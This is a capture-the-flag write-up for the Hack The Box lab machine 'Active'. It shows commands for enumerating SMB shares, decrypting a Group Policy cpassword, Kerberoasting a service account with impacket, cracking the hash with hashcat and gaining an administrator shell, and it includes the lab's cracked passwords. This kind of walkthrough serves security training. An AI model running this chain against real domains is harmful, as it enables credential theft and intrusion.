Hack The Box: Active

Difficulty: Medium


Machine Creator: eks & mrb3n


Tools Used:








Task: To find User.txt and Root.txt


Network Enumeration

Let’s start with an NMAP scan.

nmap -sV -sC

The nmap scan shows us some impressive results. We can see port 53 Microsoft DNS, port 88 Kerberos, and port 389,3268 LDAP. From all these ports we can expect this server to be a domain controller for the domain active.htb.



SMB port 445 is also on this box lets see if we can access any open shares.

smbclient -L //

smbclient //

After some trial and error, I was able to access the Replication directory which is a domain share.

After going through the shares from the domain controller, we can see the directory “Policies” this share holds all the group policies. In this directory, there is Groups.xml file this file can contain some vital information.

Group Policy

The groups.xml file is used in older versions of windows to modify accounts via group policy. In this file, we can see this will update the user active.htb\SVC_TGS and will change the password. The cpassword is an encrypted version of the password.


The vulnerability in the cpassword is the encryption key that is well known, and Microsoft has never changed the key — using the tool gpp-decrypt.


smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H

With user credential,s we can run smbmap to see what access we have to shares.


ldapsearch -x -h -p 389 -D ‘SVC_TGS’ -w ‘GPPstillStandingStrong2k18’ -b “dc=active,dc=htb” -s sub”(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.1 13556.1.4.803:=2))(serviceprincipalname=*/*))” serviceprincipalname | grep -B 1 servicePrincipalName

With LDAPsearch we can find any users that have a Service Principal Name (SPN)


python active.htb/svc_tgs -dc-ip -request

The from impacket allows us to get the hash for the administrator user. Now we need to crack this hash.


hashcat64.exe -a 0 -m 13100 active_hash.txt rockyou.txt

With the hash we got in the previous step I put the hash in a text file so we can run it through hashcat. In this instance, I am using the windows version so I can take advantage of my Nvidia 1060 graphics card. Your command will vary depending on your setup. After a couple of seconds, the hash is cracked to reveal the password “Ticketmaster1968.”

python active.htb/administrator:[email protected]

We have the user credentials for Administrator however this server does not have RDP enabled. In the impacket directory, there is a python file called, this will allow us to create a terminal session over wmi.